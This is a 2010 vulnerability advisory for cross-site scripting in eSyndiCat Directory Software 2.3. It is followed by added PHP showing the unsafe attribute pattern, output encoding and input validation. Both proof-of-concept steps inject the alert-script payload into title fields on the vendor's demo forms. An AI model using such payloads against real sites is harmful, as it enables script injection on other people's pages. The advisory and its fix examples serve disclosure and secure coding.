eSyndiCat Directory Software 2.3 Cross Site Scripting

2010-11-27T00:00:00
ID PACKETSTORM:96181
Type packetstorm
Reporter d3v1l
Modified 2010-11-27T00:00:00

Description

                                        
`-------------------------------------------------------------------------
eSyndiCat Directory Software 2.3 - Cross-Site Scripting ( XSS )  
  
http://www.esyndicat.com/   
  
25 - 11 - 2010   
  
Avram Marius ( d3v1l )   
  
http://twitter.com/securityshell - http://security-sh3ll.blogspot.com  
  
--------------------------------------------------------------------------  
Poc: 1  
  
http://www.esyndicat.com/demo/suggest-category.php?id=364  
  
On the Suggest Category form, enter a value such as "><script>alert('XSS')</script> in the Category title field.
  
  
Screen :   
  
http://twitpic.com/3aq5q8   
  
--------------------------------------------------------------------------  
  
Poc: 2   
  
http://www.esyndicat.com/demo/suggest-listing.php?id=0   
  
On the Suggest Listing form, the Title field can be set to a value such as "><script>alert('XSS')</script>
  
  
Screen :   
  
http://twitpic.com/3aq7s0  
  
--------------------------------------------------------------------------  
`
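The leading `">` in both PoC values suggests the submitted title is written back into an HTML attribute without encoding. The following is an added example, not eSyndiCat's own code, showing that pattern beside an output-encoded version and a server-side validation layer. The function names, the `title` field name and the validation policy are assumptions made for illustration.

```php
<?php
// Added illustration, not eSyndiCat source. The function names and the
// "title" field name are hypothetical stand-ins for the suggest forms.

// Unsafe pattern: the submitted title is concatenated into an attribute
// as-is, so a leading "> closes the attribute and the tag around it.
function render_title_input_unsafe(string $title): string
{
    return '<input type="text" name="title" value="' . $title . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of returning an empty string.
function render_title_input_safe(string $title): string
{
    $encoded = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="title" value="' . $encoded . '">';
}

// Second layer: validate on the server before storing or re-displaying.
// Assumed policy: 1-100 letters, digits, spaces and basic punctuation.
function validate_title(string $title): bool
{
    return preg_match('/^[\p{L}\p{N} .,&()\-]{1,100}$/u', $title) === 1;
}

// The value used in both PoCs of the advisory.
$payload = '"><script>alert(\'XSS\')</script>';

echo "unsafe: ", render_title_input_unsafe($payload), PHP_EOL;
echo "safe:   ", render_title_input_safe($payload), PHP_EOL;

// Validation result for the PoC value and for a constructed benign title.
var_dump(validate_title($payload));
var_dump(validate_title('Open Source CMS'));
```

Validation alone is not the fix: the encoding step has to be applied wherever the stored or submitted title is rendered, including any admin views that list pending suggestions.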